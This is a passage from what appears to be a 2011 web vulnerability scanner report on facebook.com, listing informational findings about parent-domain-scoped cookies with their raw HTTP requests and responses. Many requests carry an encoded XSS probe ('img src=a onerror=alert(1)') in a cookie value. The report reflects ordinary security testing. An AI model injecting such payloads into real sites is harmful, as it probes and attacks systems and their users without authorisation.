Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; _e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: _e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.101.59
X-Cnection: close
Date: Thu, 05 May 2011 12:46:07 GMT
Content-Length: 18187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.52. http://www.facebook.com/mapquest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mapquest

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mapquest HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/MapQuest
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.49
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 0

10.53. http://www.facebook.com/matthew.oliveira2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/matthew.oliveira2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /matthew.oliveira2 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.54. http://www.facebook.com/mmafighting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mmafighting

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mmafighting HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.55. http://www.facebook.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.111
Connection: close
Date: Thu, 05 May 2011 10:56:38 GMT
Content-Length: 0

10.56. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.25
X-Cnection: close
Date: Thu, 05 May 2011 11:41:04 GMT
Content-Length: 17082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.57. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?settings HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; wd=1022x1007; act=1304613664644%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613664645%2C%22act%22%2C1304613664644%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C181%2C760%2C0%2C1006%2C16%5D

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 0

10.58. http://www.facebook.com/pages/Barnesville/115038011847083 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Barnesville/115038011847083

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Barnesville/115038011847083 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.47
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 26916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.59. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Beacon-of-Hope-Resource-Center/34194116820 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.43
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 129142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.60. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Bernicks-Pepsi/123296084349478

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Bernicks-Pepsi/123296084349478 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.35
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.61. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Blaine-Senior-High/106189406087059

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Blaine-Senior-High/106189406087059 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.81
Connection: close
Date: Thu, 05 May 2011 11:42:01 GMT
Content-Length: 26986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.62. http://www.facebook.com/pages/Editor-in-Chief/137829579583400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Editor-in-Chief/137829579583400

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Editor-in-Chief/137829579583400 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.75
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.63. http://www.facebook.com/pages/Gilco-Corporation/109823499042436 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Gilco-Corporation/109823499042436

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Gilco-Corporation/109823499042436 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.156.75
Connection: close
Date: Thu, 05 May 2011 11:41:52 GMT
Content-Length: 26978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.64. http://www.facebook.com/pages/HMFIC/149403761740008 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/HMFIC/149403761740008

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/HMFIC/149403761740008 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
